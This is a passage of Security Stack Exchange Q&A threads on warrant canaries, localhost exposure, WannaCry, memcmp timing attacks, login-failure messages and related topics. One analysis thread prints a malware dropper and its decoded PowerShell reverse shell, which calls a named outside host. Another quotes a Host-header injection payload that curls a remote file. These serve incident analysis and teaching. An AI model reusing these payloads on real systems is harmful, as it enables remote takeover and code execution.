"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148256/"
]
} |
159,554 | While browsing VeraCrypt's website I found its warrant canary . I tried to understand what it is and what its purpose was by reading corresponding Wikipedia article . To be honest I find it quite confusing. Can someone explain what a warrant canary is in a bit less complicated way than Wikipedia does? | Governments may issue secret government subpoenas to communication providers that force them to disclose private data about their users or insert backdoors into their products. Furthermore, governments may give criminal penalties to an organization that chooses to publicly disclose if a subpoena was issued. Some tech organizations attempt to get around this by regularly issuing "we have never been issued any such government subpoenas" while signing their messages with their private key. This message is called a warrant canary, with an analogy to a canary in a coal mine. (If the mine begins to fill up with poisonous gases, the small canary will feel its effects before humans and serves as a warning to everyone to get out of the coal mine). If the government issues a subpoena to them, they promise they will stop issuing the cryptographically signed message stating "we have never been issued any secret gov't subpoenas". While the law allows the gov't to penalize them for disclosing information about a secret subpoena, there is (currently) no law that would require them to continue issuing such warrant canaries. Granted, it's feasible for a gov't court to secretly force an organization to give up their private keys that were used to sign their warrant canary, or require them to continue publishing their warrant canaries or suffer severe consequences; whether this happens in practice is not publicly known. It's also possible that the people issuing the warrant canary are not trustworthy people and would voluntarily continue to issue them, even while complying with government subpoenas. For more information check out these links from the comments: https://www.yalelawjournal.org/forum/warrant-canaries-and-disclosure-by-design https://law.stackexchange.com/questions/268/what-is-the-legal-status-of-warrant-canaries | {
"source": [
"https://security.stackexchange.com/questions/159554",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11996/"
]
} |
159,725 | When I'm developing a webapp, let's say a Django site, I run it locally and typically access it at http://localhost . I thought this was inherently secure because I assumed that localhost can only be accessed locally. However, I discovered that even running a local web server (Apache, Nginx...) with a self-signed HTTPS certificate won't help because localhost is not really required to be local: In empirical testing, we've seen multiple resolvers... send localhost queries to the network... As a result accessing " https://localhost ", say, on a hostile WiFi access point (such as your coffee shops) can be intercepted by a network attacker and redirected to a site (or a certificate) of their choosing. (In email chain " Exception to Baseline Requirements, section 7.1.4.2.1 ".) If I'm developing a webapp, I need to run it locally and access it through a browser. Sometimes I need to do this at a coffee shop with an internet connection. What access point should I use, if not localhost? Note Some of my desktop applications also expose themselves via HTTP at other ports, for example http://localhost:9000 . Presumably I shouldn't access those at a coffee shop either? | Safely developing against localhost can be done provided: your machine is configured to resolve localhost to a loopback address (note, it's possible to change your hosts file to resolve localhost to a different address) your machine is configured to route the loopback address via the loopback interface (it's possible to route loopback addresses to non loopback interface) you configure your application to listen on the loopback address, not 0.0.0.0 (many web frameworks listens on 0.0.0.0 by default, this is probably the most common reason for unexpectedly exposing services to untrusted network during development) if you use a proxy, your browser is configured not to route localhost/loopback through the proxy In other words, a fairly typical networking configuration. Also, take care that your database server aren't binding to 0.0.0.0, as that'll allow anyone on the network to connect directly to the database server. It's probably best to set a firewall configuration so you know exactly what ports and addresses that local services are listening on. The link you pointed is under the context of a publicly trusted CA issuing certificates with "localhost" name. This is unsafe under that context because the recipient of such certificate may use the certificate to intercept the communication of someone with some unusual networking configurations. When you have full control over your own machine's configuration and you know that you don't have some weird configurations on your machines, the loopback interface is safe. | {
"source": [
"https://security.stackexchange.com/questions/159725",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7062/"
]
} |
159,878 | First things first, I'm not asking this question because of any specific alarm on my PC that I suspect to be false. It's just that from the perspective of the software industry, it would make some sense to implement false alarms every now and then, give paying users the wrong feeling that they really do need the antivirus software, and thereby keeping them paying for updates, even if there never was an actual threat on the system. Are there any known cases of something like this happening? | The problem with deliberately triggering false alarms is that users will at some point lose trust in the AV software. The rates of false positives are also an important factor in AV rankings - and these rankings potentially influence users' buying decisions. So legitimate AVs will probably offer you potentially unnecessary bonus features rather than pretending there is a concrete dangerous infection that can only be fixed with an expensive upgrade. (Software that constantly warns about non-existent threats would get into the realm of scareware .) How important good detection rates are for an AV company's reputation shows the reported story from 2015 that Kaspersky employees had submitted mocked records to VirusTotal to trigger false positives in competing AVs: Two former Kaspersky employees have accused the company of faking malware to harm rival antivirus products. They would falsely classify legitimate files as malicious, tricking other antivirus companies that blindly copied Kaspersky's data into deleting them from their customers' computers. (Source) That said, many AV companies have been criticized for unethical behavior. E.g., Symantec (the company behind Norton Antivirus) has been alleged of charging unapproved extra fees and pretending "remove" non-existent malware: Symantec has been criticized by some consumers for perceived ethical violations, including allegations that support technicians would tell customers that their systems were infected and needed a technician to resolve it remotely for an extra fee, then refuse to refund when the customers alleged their systems had not actually been infected. (Source) | {
"source": [
"https://security.stackexchange.com/questions/159878",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148742/"
]
} |
160,097 | I understand that WannaCry spreads itself by exploiting the SMBv1 vulnerability, which is fixed by patch MS17-010. Does this mean that even with the patch installed, WannaCry can still infect the computer--if the user downloads and executes it--but not propagate itself through the computer's network? Does Windows Defender/any current security software block the execution of WannaCry if, say, a user executes it? | If you download and execute WannaCry, it will still lock your files and attempt to infect other unpatched computers in the network. WannaCry only needs the SMB exploit to get into a system, not to get out. Once it has control of your system, it does not need the exploit to execute arbitrary code, including the worm. The MS17-010 patch protects your computer from being infected through this exploit, but it does not prevent your computer from infecting other machines on the same network if those other machines are not patched. To protect other computers on the network, you need to block all outgoing traffic to port 445. I've not (yet) seen WannaCry try and circumvent a blocked outgoing port. There are several variants of WannaCry out there. These all seem to be detected by major antivirus software, including Windows Defender. You can see a full list of antivirus software that detect a particular version on Virus Total, e.g. for this sample . comae.io seems to have a decent compilation of variants found in the wild which you can search for on Virus Total. | {
"source": [
"https://security.stackexchange.com/questions/160097",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/148989/"
]
} |
160,112 | I have a dd of a computer which has a LUKS-encrypted partition. I do not have the password but I do have a recovery key which would allow me to change the password through a GUI interface when the computer is booted. Unfortunately, I no longer have direct access to the source computer to reset the password. What I wish to do is reset the password using the recovery key so I can then access the data. I can obviously dump the dd copy to a HDD and boot the system but is there a way to reset the LUKS password with the recovery key through a CLI? I am thinking the ideal scenario is to mount the DD and then reset the password. | If you download and execute WannaCry, it will still lock your files and attempt to infect other unpatched computers in the network. WannaCry only needs the SMB exploit to get into a system, not to get out. Once it has control of your system, it does not need the exploit to execute arbitrary code, including the worm. The MS17-010 patch protects your computer from being infected through this exploit, but it does not prevent your computer from infecting other machines on the same network if those other machines are not patched. To protect other computers on the network, you need to block all outgoing traffic to port 445. I've not (yet) seen WannaCry try and circumvent a blocked outgoing port. There are several variants of WannaCry out there. These all seem to be detected by major antivirus software, including Windows Defender. You can see a full list of antivirus software that detect a particular version on Virus Total, e.g. for this sample . comae.io seems to have a decent compilation of variants found in the wild which you can search for on Virus Total. | {
"source": [
"https://security.stackexchange.com/questions/160112",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149006/"
]
} |
160,235 | I am in the process of writing a security vulnerabilities report on an application used at my employer, having completed an application audit. One discovered vulnerability can lead to unauthorized deletion / destruction of data. In the context of the CIA security principles,I associate integrity to be concerned with safeguarding data from unauthorized modification, such as through MITM and availability with safeguarding data from DoS such as through smurf or teardrop attacks. I am inclined to say that unauthorized deletion of data is an attack on Availability principle given the data can no longer be accessed by legitimate users. However, one of my colleagues disagrees and considers such to be an attack on the Integrity principle, because data was modified by being destroyed without authorization . Is the unauthorized deletion of data considered a breach of integrity or availability? | However, one of my colleagues disagrees and considers such to be an attack on the Integrity principle, because data was modified by being destroyed without authorization. Your colleague has a point. Unauthorized data deletion is foremost a breach of integrity since deletion can be considered a special case of modification. This can have an impact on availability, but it doesn't have to. E.g, an attacker who manages to delete all logfiles on a web server probably wouldn't impact the server's uptime. But obviously a breach of integrity often implies impaired availability since a service with corrupted resources will likely not function properly. I wouldn't always force a vulnerability into one of the three CIA categories, though. The impact of unauthorized data deletion is quite obvious, so I'm not sure categorizing it according to the CIA triad adds any clarification. Also note that there are many alternative models such as the Parkerian hexad that give you a few more options to choose from. | {
"source": [
"https://security.stackexchange.com/questions/160235",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/106510/"
]
} |
160,372 | A piece of code was running on my Windows machine at startup. I would like to know exactly what this code is doing; it seems to refer to something like crackbook? @echo off
if %PROCESSOR_ARCHITECTURE%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )
if %PROCESSOR_ARCHITECTURE%==AMD64( START /B %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) EDIT : I tried formatting my PC. It seems like a spyware from prpops.com (NSFW) is installed on my system without any notice. The config file which used to start on my PC is still there even after I formatted my PC. Here is a little code that it runs through which above bat file used to run. Dim WinScriptHost
WScript.Sleep(30000)
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
While True
set service = GetObject ("winmgmts:")
running = 0
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = "powershell.exe" then
running = running + 1
End If
next
If running < 1 then
WinScriptHost.Run Chr(34) & "%USERPROFILE%\appdata\file.bat" & Chr(34), 0
End If
WScript.Sleep(120000)
Wend
Set WinScriptHost = Nothing Please tell if this auto-downloads the script or stores it in any way in memory? | Short version The attacker is able to run any PowerShell commands on your machine and can be found by getting the owner of " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com ". Long version I dumped the binary array into a file and uploaded it to VirusTotal . The newly launched file seems like an additional stage to me since it is really small (1.7 kb) and will be executed for 10 seconds only since it will be bound to PowerShell (since the attacker creates a thread instead of launching it as a separate process) and the termination is delayed by 10 secs at the last command. Update: I'm sadly unable to reverse-engineer assembly, but a quick look at the file using a text editor revealed the following string: powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();) However, this stage also utilities GZIP as an additional obfuscation layer to Base64, but still can be dumped to: # Powerfun - Written by Ben Turner & Dave Hardy
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
}
function powerfun
{
Param(
[String]$Command,
[String]$Sslcon,
[String]$Download
)
Process {
$modules = @()
if ($Command -eq "bind")
{
$listener = [System.Net.Sockets.TcpListener]9999
$listener.start()
$client = $listener.AcceptTcpClient()
}
if ($Command -eq "reverse")
{
$client = New-Object System.Net.Sockets.TCPClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com",9999)
}
$stream = $client.GetStream()
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient("ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com")
$stream = $sslStream
}
[byte[]]$bytes = 0..20000|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
if ($Download -eq "true")
{
$sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
ForEach ($module in $modules)
{
(Get-Webclient).DownloadString($module)|Invoke-Expression
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
$listener.Stop()
}
}
powerfun -Command reverse -Sslcon true This is a rather simple PowerShell backdoor which is connecting to a server and then allows the attacker to remotely run PowerShell commands on your machine. This "powerfun" script can be found on GitHub by googling two seconds so I won't link it here to not stretch the anti-spam limits. However, by comparing it to the original script, you'll quickly notice that the attacker changed the remote server address to " ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com " and the port to 9999 , so it should be easy to track the attacker if needed. Finally: The server is still listening to that port, so the attacker is
able to control your computer! | {
"source": [
"https://security.stackexchange.com/questions/160372",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149284/"
]
} |
160,473 | For laptops with full disk encryption or home folder encryption, one of the risks if it is stolen while in sleep mode is that the encryption key is stored in memory and can be read if an attacker knows how. To me, it seems that, in theory, operating systems should be able to have a "secure sleep" option where the key is erased from memory prior to sleep mode, and on resume, the user must provide a password to unlock the encryption key, as through a cold boot. All processes except the lock screen would be prevented from continuing until the encryption key is restored to memory. I realize that this would mean that the computer cannot do any scheduled tasks in sleep mode, but most users probably wouldn't care about that. And maybe drivers or other obstacles would prevent this from being realistic. Are there any reasons why a "secure sleep" option cannot be easily implemented? | Yes. It could be easily achievable, although it would require kernel support do this properly. In the suspend-to-RAM case, the key should be deleted from the RAM, and in the suspend-to-disk case, from the RAM and also from the disk (or it can be stored encrypted on the disk). A minimal input should be also provided to get the key/reauthentication credentials in the early boot/wakeup stage. I don't see any technical obstacles; the probable reason that it wasn't developed until now was the lack of interest. Scenarios where direct RAM access of a working laptop is a real security risk are very rare. | {
"source": [
"https://security.stackexchange.com/questions/160473",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24537/"
]
} |
160,496 | Suppose, a user can click a button on a website and downloads a file with a secret. Via ajax. Is it more secure if a server generates that file and sends it as 1) zip, tar or the like -- a binary file. Content type: application/octet-stream or application/zip or something similar. 2) or as a plain text file? Content type: text/plain. Note that in the 1) case, zip/tar whatever isn't protected by a password. HTTPS is used in both cases. | There isn't really a difference. If you use proper TLS encryption, neither can be read by a man in the middle, and if the server properly authenticates requests, nobody who is not allowed to will be able to download the file. If you don't use proper TLS or do not properly authenticate users, an attacker could read the file in both cases. You definitely should not use non-password protected zipping as a security measure. | {
"source": [
"https://security.stackexchange.com/questions/160496",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32926/"
]
} |
160,692 | Well, I only have two examples, but it seems to be a slowly growing thing. First, I noticed that hotmail.com/live.com started to do this - ask for the email address on the first screen, and then you have to click 'next' and then enter your password. ... Man, is this annoying! At least trusty gmail knows good UX. A few months later gmail are doing the same thing. So, I assume there is a security reason for this workflow because it can't be for UX (?) But what is the reason? Is it to do with tricking bots/making their life more difficult? | Security / Privacy disadvantage There are security and privacy risks involved with this approach when badly implemented. An attacker could figure out if the email- or login already exists, when not having a default flow. As mentioned @Mario Trucco this can also be done via the registration process. Security is at risk: Because it becomes easier for an attacker to bruteforce their way into a system. It will make guessing easier if you only need to guess a password, instead of both the username and password. The privacy of users is under scrutiny. (Other people will know if you are listed at that website.) Reasons why this is implemented I found this on the Google documentation : This new Google account sign-in flow will provide the following advantages: Preparation for future authentication solutions that complement
passwords A better experience for SAML SSO users, such as university students or corporate users that sign in with a different identity provider than Google Security Advantage It may enable more personalized customization options for security such as phrases or images providing more security options (see example below). This would reduce the scope of phishing as the screen generated would be specific to the user and would vary from user to user. Because users can have different ways of authenticating and the identity of the user is equal to the username this will make it easier server-side to redirect traffic to the users form of authenticating Example image -v The users sees 'his/her' personal Image or Sound. If that image does not correspond with the image given at registration. The users knows this is a fake login. | {
"source": [
"https://security.stackexchange.com/questions/160692",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149518/"
]
} |
160,737 | I have the Netflix account in our family, meaning I have the password. It's a secure password, with 16 characters, including symbols, numbers and uppercase, for example 3?TeJ)6RK]4Z_a>c , which has around 80 bits of entropy. However, I have to share this password with other members of the family, so they can also login to it. Is using WhatsApp or Facebook Messenger secret conversation an acceptable method for this? Are there better methods? | Both Facebook Messenger (using secret conversations) and WhatsApp implement end-to-end encryption, which means that when you send a message your text is encrypted on your computer and decrypted on the destination computer. The text of your messages is not visible to anyone in between unless they break the encryption, which for practical purposes is not going to happen (unless you happen to be the subject of a national security investigation, in which case you've got bigger problems than sharing your Netflix password with the wonks at the NSA). However, beware that end-to-end encryption only protects the communication channel itself. It does not protect you from threats such as: Malware, such as keyloggers or screen grabbers that have been installed on your machine or the destination machine Friends/family who decide to re-share or change your password without your permission Netflix, who monitors these things and will see that your account is being used in multiple geographic places and thus probably being shared against their terms of service. Netflix has plans that allow multiple streams among family members, so this in itself is not an actionable issue unless your password is somehow shared widely. Law enforcement, if you happen to live in an area that has criminalized password sharing As pointed out by daniel in the comments, Facebook (who owns both Facebook Messenger and WhatsApp) might accidentally provide weak security or be complicit in breaking user security (e.g. in order to assist a law enforcement investigation). As proprietary applications (not open source) neither of these softwares have been vetted by outside security researchers, so Facebook might have a poor implementation or they might be copying/inspecting your data at either the source or destination device. Additionally, since these applications create and control the encryption keys used to implement the end-to-end encryption, you must assume that Facebook can break the encryption if they so desire (or anyone they would give the keys to, e.g. law enforcement). Another excellent point from Gert van den Berg in the comments: some messaging apps will automatically back up to the cloud. The security around cloud storage is not nearly as strong as the end-to-end encryption used in the communications channel. See, for example, the Fappening attacks for more info as to how the cloud represents a threat to data privacy. (Even for supposedly deleted data!) | {
"source": [
"https://security.stackexchange.com/questions/160737",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40114/"
]
} |
160,808 | From man 3 memcmp : Do not use memcmp() to compare security critical data, such as
cryptographic secrets, because the required CPU time depends on the
number of equal bytes.
Instead, a function that performs comparisons in constant time is required. Why is that so? My thinking is that if someone has access to the machine that processes this "security critical data," then these secrets are already compromised because that person can extract them from RAM. Or, if that person has no access to the machine, then they cannot accurately measure CPU time anyway. | Exploiting timing information is one possible attack against things like password authentication systems. Conceptually memcmp() works by comparing two sets of binary data on a byte-by-byte basis (in reality processors can compare multiple bytes at a time, depending on optimizations, but the same principles below will apply). The function starts at the beginning of the data, compares each byte sequentially, and exits as soon as it finds a difference. If no difference is found then the function returns a code indicating that the data matches. Because the function returns as soon as it finds a difference, an attacker with a sufficiently accurate clock can deduce secret information. They can induce calls to memcmp() with different inputs and by measuring which inputs take longer they can deduce what a stored secret might be. Example: Consider a classical password hashing system. Suppose your password is stored as a secret hash, say for example Ek8fAMjPhBo . (That hash was generated using the DES scheme provided by the Linux crypt() function with a salt of na and a password of secret . Note that this function is insecure and you should not use it in real systems.) In a strong password system your hash Ek8fAMjPhBo is stored, but your password is not stored. When you are asked to authenticate the system will take your password, hash it, and then compare the two hashes to one another. If the resultant hashes match then you are granted access to the system, if the hashes do not match then your password is rejected. This allows the system to check to see whether or not you know your password without actually storing the password itself. How an attacker can use timing to attack this system: In order to attack this system an adversary really just needs to figure out what password hashes to the stored hash. Normally the stored hash is kept secret, but the adversary can use timing information to deduce what the stored hash could be. Once the adversary deduces the stored hash it is vulnerable to much faster and off-line rainbow table attacks, as well as circumventing on-line security measures like password retry limits. The password system above has to compare a candidate hash against the stored hash in order to function properly. Suppose it takes 10 nanoseconds to compare each byte of the candidate hash to the secret stored hash. If no bytes match (one comparison) then memcmp() will take about 10ns. If one byte matches (two comparisons) then memcmp() will take about 20ns. Your attacker generates a few passwords and runs them through the system, recording how long each one takes. Suppose the first few hash comparisons take about 10ns each and then return, indicating that none of the bytes of the candidate hash match the stored hash. After a few tries one of the hash comparisons takes 20ns- which indicates that the first byte of the candidate hash matches the stored hash. In the example above this indicates that the attacker has deduced that the first byte of the hash Ek8fAMjPhBo is E . Hashes by design have the property that you can't predict what hash will correspond to what password, so for example this does not tell the attacker that the password starts with s . However, the attacker could have a large table of pre-computed hashes (a rainbow table ) so they can look up other passwords that hash to a string starting with E . After they try enough hashes they'll eventually get an input that causes memcmp() to take 30ns, which indicates that the first two bytes match, and they have deduced that the first two bytes of the hash are Ek . They repeat this process over and over until they deduce all or most of the hash. At that point they either know the password or can brute force it with a traditional rainbow table attack. This is a little hypothetical, but you can find lots of practical information about timing attacks elsewhere on the net, for example: https://research.kudelskisecurity.com/2013/12/13/timing-attacks-part-1/ | {
"source": [
"https://security.stackexchange.com/questions/160808",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108649/"
]
} |
160,879 | On Code Review stack exchange, in response to code that informs the user when their login attempt failed because of too many login attempts from an IP, I was told "Absolutely do not message end user telling them why login failed.
You are giving a potential attacker critical information to aid them
in attacking you application. Here you give an attacker very precise
information to get around your IP restriction." https://codereview.stackexchange.com/a/164608/93616 Am I practicing bad security? Should I explain in more vague terms like "Too many login attempts" or "You could not be logged in"? Update : In case there's any ambiguity, currently the too many attempts logic and message does not care if the attempts were successful or not. | Absolutely do not message end user telling them why login failed. You are giving a potential attacker critical information to aid them in attacking you application. On the other hand, not telling a user why their login failed is a potential usability disaster. If you don't clarify whether the user's IP was banned or the user instead used a wrong password, they might panic since it seems to them that someone accessed their account and changed the password to lock them out. If my login with a pre-filled password fails, the first thing I'm thinking of is a break-in rather than an IP block. Also, a naive IP blocking mechanism might be ineffective and introduce additional problems. It is potentially trivial to bypass for an attacker with sufficient resources and someone who shares an IP address with other users might abuse the IP ban to lock out others. Instead, a CAPTCHA after n failed attempts per IP might be a softer solution and more appropriate for your application. Also see: Is it good practice to ban an IP address if too many login attempts are made from it? Why do people use IP address bans when IP addresses often change? | {
"source": [
"https://security.stackexchange.com/questions/160879",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/91316/"
]
} |
160,991 | We recently setup a two tier internal certificate authority. We also disseminate Root CAs via Active Directory so certificates from our internal CA are automatically trusted by every (Windows) system in our network. Our devs need SSL certificates for their local workstations. One option would be to generate a wildcard certificate to them like *.foo.bar.com . The benefits are ease of implementation and future proof-ness (if we create new subdomains in the future, it covers them automatically). However, the flip side is if we were to issue a wildcard certificate, how can you be certain that a malicious employee won't abuse it? Imagine a situation where a malicious dev sets up a website on their local workstation (mail.foo.bar.com) and can somehow either also poison DNS or modify a user's local host file. That wildcard certificate lends credibility to their malicious website, making it look more authentic. Am I being overly paranoid? Should we issue wildcards and make certificate maintenance easier or should we generate unique certificates for every DNS name to limit the scope of use? Anybody have any thoughts? Experiences? EDIT To me it seems there are two very good solutions posted here: Separate dev/test and production into independent CAs as recommended by @Kotzu. For us personally I can't justify setting up a second CA just for that purpose. It's too much effort for the number of certificates we have (40 total of which 10-20 are dev). That said, I totally think its the best answer. Modify the DNS naming structure as recommended by @immbis so that the "dev" portion of the name is the subdomain not the sub-subdomain. Thus making the wildcard more obviously a dev domain. This would alleviate my concerns about issuing wildcard certificates to a great extent. Then impersonation can only occur for *.dev.ourdomain.com - which I'm ok with. That said, we just have it hard coded too many places to make this practical. I think what we'll end up doing is continue to issue fully qualified SSL certificates to each dev. That feels safer as it leaves a lot less wiggle room for a malicious person to abuse/impersonate a legitimate resource. This entire situation is a bit of a tails case anyway. I hope our devs generally aren't acting maliciously and trying to set up bogus sites. I just don't want to be handing out trusted wildcard certs like free candy only to later have them be ab/used some unexpected way. If we need more and more certificates and issuing individual certificates becomes unmanageable then we'll consider setting up a second CA that's only trusted by the dev workstations (not the whole company) and issuing new wildcard certs. | I think you should segregate your environment. Only production certificates should be trusted on all your network. Dev and testing certificates should only be trusted on the computers where developers work.
In a more secure environment you would not even use the same root CA for production and development environments. | {
"source": [
"https://security.stackexchange.com/questions/160991",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1928/"
]
} |
161,037 | We received a large number of error messages from our django application, like this: Invalid HTTP_HOST header: ‘target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}-o${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}69.64.61.196${substr{0}{1}{$spool_directory}}rce.txt}} null)’. The domain name provided is not valid according to RFC 1034/1035.
...
Request information:
GET: action = u'lostpassword'
POST: user_login = u'admin' wp-submit = u'Get New Password'
FILES: No FILES data
COOKIES: No cookie data
... I have not seen anything like it before, and I'm having trouble figuring out what it means. Could this be part of some exploit, or am I just being paranoid? | To expand on the answer provided by @Swashbuckler, CVE-2017-8295 specifically relates to WordPress password resets with the HOST HTTP header set. When WordPress sends out password reset emails, they set the From / Return-Path to the value of $_SERVER['SERVER_NAME'] (in PHP). This value is set by some web servers (e.g. Apache) based on the HOST HTTP header. This means that attackers can make WordPress send out emails that have From / Return-Path set to an email address of their choosing. If the email is bounced or responded to, it will happen to this malicious email address and - if the original email was attached - the attacker will then have access to the password reset link. Actually abusing the exploit requires two factors to happen: the web server must read the hostname from the HOST header, and the email must be bounced or replied to. The former can be fixed by the server admin (if using Apache, by setting UseCanonicalName On ), the latter requires the attacker to somehow block the victim's mail server (e.g. by DoS'ing it) or for the victim to reply to the email. As pointed out by @TerrorBite, the attackers aren't actually targeting the password reset links, but only using the bug to exploit a bug in the PHP mail() function. See his answer below. | {
"source": [
"https://security.stackexchange.com/questions/161037",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149887/"
]
} |
161,046 | My email provider still supports old SSL_RSA_WITH_RC4_128_SHA ciphers. What does that mean for me? If I use an updated system (Ubuntu 16.04) and an updated client (Thunderbird 52), shouldn't it use this ciphers? But when there is someone with an older system, he would still be able to connect to the server and would not be rejected and send his credentials and content with bad encryption. Is that the unique problem? | To expand on the answer provided by @Swashbuckler, CVE-2017-8295 specifically relates to WordPress password resets with the HOST HTTP header set. When WordPress sends out password reset emails, they set the From / Return-Path to the value of $_SERVER['SERVER_NAME'] (in PHP). This value is set by some web servers (e.g. Apache) based on the HOST HTTP header. This means that attackers can make WordPress send out emails that have From / Return-Path set to an email address of their choosing. If the email is bounced or responded to, it will happen to this malicious email address and - if the original email was attached - the attacker will then have access to the password reset link. Actually abusing the exploit requires two factors to happen: the web server must read the hostname from the HOST header, and the email must be bounced or replied to. The former can be fixed by the server admin (if using Apache, by setting UseCanonicalName On ), the latter requires the attacker to somehow block the victim's mail server (e.g. by DoS'ing it) or for the victim to reply to the email. As pointed out by @TerrorBite, the attackers aren't actually targeting the password reset links, but only using the bug to exploit a bug in the PHP mail() function. See his answer below. | {
"source": [
"https://security.stackexchange.com/questions/161046",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/149900/"
]
} |
161,059 | Disclaimer: I'm a computer programmer, not a security analyst or anything to do with security. I have zero experience in the world of cryptography, so bear with me please. Situation: I was given the task to integrate a client's site with a data hosting site. While working on that, I stumbled upon a query that dumps all users' data. To make this query, the user has to 'authenticate' to get a session and use that session code to make this query, which then checks that the user has admin privileges before completing the query and responding. But still... that seems sort of horrible to me. Especially since this is some of the data that is sent back if the query is successfully run: "username": "[email protected]",
"firstname": "Test",
"lastname": "Name",
"userpassword": "$1$te000000$qMpAriadAHuRyDkK58YKS0" There is more data returned that is horrible to expose, but that's not my primary concern. Clearly no person has ever been named "Test Name", and "testemail.blerg" is not a registered domain, let alone "blerg" being a possible top-level domain. Even if it were, that account has been deleted from the data hosting site and cannot log in. The password that was used is a weak, test-case one, and is not in-use by anyone. Is is possible for me to brute-force/rainbow-table (while I don't have experience, I know some flash-words :P) or something to get the password from that? What little (I think) I know is that the first part of the userpassword is the MD5 salt, but I don't know anything else. If anyone can explain how easy it is, I can prove to my boss that this site is completely horrible and convince our client to migrate from this data hosting site. There is more that I do know about the salting (i.e. how it gets the salt, what language/function it's using, etc), but I'd like to see how easily someone who doesn't have access to that information can figure it out. Another thing for me to go to my boss with, hopefully. EDIT: There seems to a little confusion related to my intentionally being vague in the description, partially for the purpose of preventing any indication of which CRM this is, for legal/etc reasons. I also realize that my calling it 'data hosting' was potentially misleading, so my bad. Hopefully this clarifies: The work our team is doing is creating a basic website for a company to show off their products. The only interaction I have with the CRM is: When a person fills out the Contact Us form, we POST to the 